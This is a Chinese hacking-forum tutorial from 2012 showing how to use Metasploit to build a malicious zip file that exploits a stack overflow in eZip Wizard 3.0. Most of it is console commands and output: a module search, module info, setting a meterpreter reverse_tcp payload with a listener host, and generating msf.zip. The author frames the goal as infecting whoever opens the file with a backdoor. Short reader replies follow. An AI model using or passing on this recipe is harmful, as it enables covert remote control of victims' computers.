切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
9. Metasploit的本地漏洞利用[复制链接]
发表于 2012-8-4 00:39:32 | 显示全部楼层 |!read_mode!

这个很简单的理解,本地例如: RAR ZIP 播放器等等,当我们用MSF生成漏洞文件后,别人用特定的工具打开,就会中马

打开UB 1 ,我们来利用ZIP吧,启动METASPLOIT 搜索rar


  1. msf > search zip

  2. Matching Modules
  3. ================

  4.    Name                                                     Disclosure Date  Rank       Description
  5.    ----                                                     ---------------  ----       -----------
  6.    auxiliary/admin/oracle/post_exploitation/win32upload     2005-02-10       normal     Oracle URL Download
  7.    auxiliary/dos/wifi/netgear_ma521_rates                                    normal     NetGear MA521 Wireless Driver Long Rates Overflow
  8.    auxiliary/dos/wifi/netgear_wg311pci                                       normal     NetGear WG311v1 Wireless Driver Long SSID Overflow
  9.    exploit/multi/fileformat/peazip_command_injection        2009-06-05       excellent  PeaZip <= 2.6.1 Zip Processing Command Injection
  10.    exploit/multi/http/splunk_mappy_exec                     2011-12-12       excellent  Splunk Search Remote Code Execution
  11.    exploit/multi/wyse/hagent_untrusted_hsdata               2009-07-10       excellent  Wyse Rapport Hagent Fake Hserver Command Execution
  12.    exploit/osx/browser/safari_metadata_archive              2006-02-21       excellent  Safari Archive Metadata Command Execution
  13.    exploit/solaris/dtspcd/heap_noir                         2002-07-10       great      Solaris dtspcd Heap Overflow
  14.    exploit/windows/browser/adobe_shockwave_rcsl_corruption  2010-10-21       normal     Adobe Shockwave rcsL Memory Corruption
  15.    exploit/windows/browser/ms06_067_keyframe                2006-11-14       normal     Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
  16.    exploit/windows/browser/winzip_fileview                  2007-11-02       normal     WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow
  17.    exploit/windows/driver/dlink_wifi_rates                  2006-11-13       low        D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
  18.    exploit/windows/fileformat/ezip_wizard_bof               2009-03-09       good       eZip Wizard 3.0 Stack Buffer Overflow
  19.    exploit/windows/fileformat/real_networks_netzip_bof      2011-01-30       good       Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability
  20.    exploit/windows/fileformat/scadaphone_zip                2011-09-12       good       ScadaTEC ScadaPhone <= v5.3.11.1230 Stack Buffer Overflow
  21.    exploit/windows/fileformat/tugzip                        2008-10-28       good       TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability
  22.    exploit/windows/ftp/3cdaemon_ftp_user                    2005-01-04       average    3Com 3CDaemon 2.0 FTP Username Overflow
  23.    exploit/windows/ftp/easyftp_cwd_fixret                   2010-02-16       great      EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
  24.    exploit/windows/http/hp_nnm_ovas                         2008-04-02       good       HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
  25.    exploit/windows/telnet/gamsoft_telsrv_username           2000-07-17       average    GAMSoft TelSrv 1.5 Username Buffer Overflow
  26.    exploit/windows/tftp/attftp_long_filename                2006-11-27       average    Allied Telesyn TFTP Server 1.9 Long Filename Overflow


  27. msf >
复制代码
随便找一个看看 exploit/windows/fileformat/ezip_wizard_bof


  1. msf > info exploit/windows/fileformat/ezip_wizard_bof

  2.        Name: eZip Wizard 3.0 Stack Buffer Overflow
  3.      Module: exploit/windows/fileformat/ezip_wizard_bof
  4.     Version: 15014
  5.    Platform: Windows
  6. Privileged: No
  7.     License: Metasploit Framework License (BSD)
  8.        Rank: Good

  9. Provided by:
  10.   fl0 fl0w
  11.   jduck
  12.   Lincoln

  13. Available targets:
  14.   Id  Name
  15.   --  ----
  16.   0   Windows Universal

  17. Basic options:
  18.   Name      Current Setting  Required  Description
  19.   ----      ---------------  --------  -----------
  20.   FILENAME  msf.zip          yes       The output file name.
  21.   USERNAME                   yes       Username

  22. Payload information:

  23. Description:
  24.   This module exploits a stack-based buffer overflow vulnerability in
  25.   version 3.0 of ediSys Corp.'s eZip Wizard. In order for the command
  26.   to be executed, an attacker must convince someone to open a
  27.   specially crafted zip file with eZip Wizard, and access the
  28.   specially file via double-clicking it. By doing so, an attacker can
  29.   execute arbitrary code as the victim user.

  30. References:

  31. http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-1028


  32. http://www.osvdb.org/52815


  33. http://www.securityfocus.com/bid/34044


  34. http://www.edisys.com/


  35. http://www.exploit-db.com/exploits/8180


  36. http://www.exploit-db.com/exploits/12059

  37. msf >
复制代码
eZip Wizard 3.0的本地溢出 我们来生成一下:

  1. msf > use exploit/windows/fileformat/ezip_wizard_bof
  2. msf exploit(ezip_wizard_bof) >
复制代码
  1. msf  exploit(ezip_wizard_bof) > show options

  2. Module options (exploit/windows/fileformat/ezip_wizard_bof):

  3.    Name      Current Setting  Required  Description
  4.    ----      ---------------  --------  -----------
  5.    FILENAME  msf.zip          yes       The output file name.
  6.    USERNAME                   yes       Username


  7. Exploit target:

  8.    Id  Name
  9.    --  ----
  10.    0   Windows Universal


  11. msf  exploit(ezip_wizard_bof) > set USERNAME
  12. set USERNAME   
  13. msf  exploit(ezip_wizard_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
  14. PAYLOAD => windows/meterpreter/reverse_tcp
  15. msf  exploit(ezip_wizard_bof) > set USERNAME test
  16. USERNAME => test
  17. msf  exploit(ezip_wizard_bof) > set LHOST 5.5.5.5
  18. LHOST => 5.5.5.5
  19. msf  exploit(ezip_wizard_bof) > exploit

  20. [*] Creating 'msf.zip' file...
  21. [+] msf.zip stored at /root/.msf4/local/msf.zip
  22. msf  exploit(ezip_wizard_bof) >
复制代码








查看一下生成的文件:

  1. root@Dis9Team:~# file /root/.msf4/local/msf.zip
  2. /root/.msf4/local/msf.zip: Zip archive data, at least v2.0 to extract
  3. root@Dis9Team:~#
复制代码
当别人用eZip Wizard 3.0打开以后 就会中我们的PAYLOAD 后门


操千曲而后晓声,观千剑而后识器。
发表于 2014-5-21 08:21:55 | 显示全部楼层
谢谢分享!!
发表于 2015-3-15 09:09:55 | 显示全部楼层
很霸气的溢出攻击
发表于 2015-4-6 19:26:56 | 显示全部楼层
能回复吗?
发表于 2015-4-7 15:49:25 | 显示全部楼层
级别不够看不了
发表于 2015-4-8 15:09:24 | 显示全部楼层
可惜防火墙会拦截,杀软会杀。
发表于 2015-4-13 10:25:48 | 显示全部楼层
看看啊!!学习下
发表于 2015-6-9 21:06:55 | 显示全部楼层

已有 1 人评分金币 收起 理由
店小二01 -10 只发表情算灌水

总评分: 金币 -10   查看全部评分

发表于 2015-12-9 14:03:49 | 显示全部楼层
谢谢分享,内容不错

发表于 2015-12-18 15:38:16 | 显示全部楼层

代码区

GMT+8, 2020-10-28 14:17

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部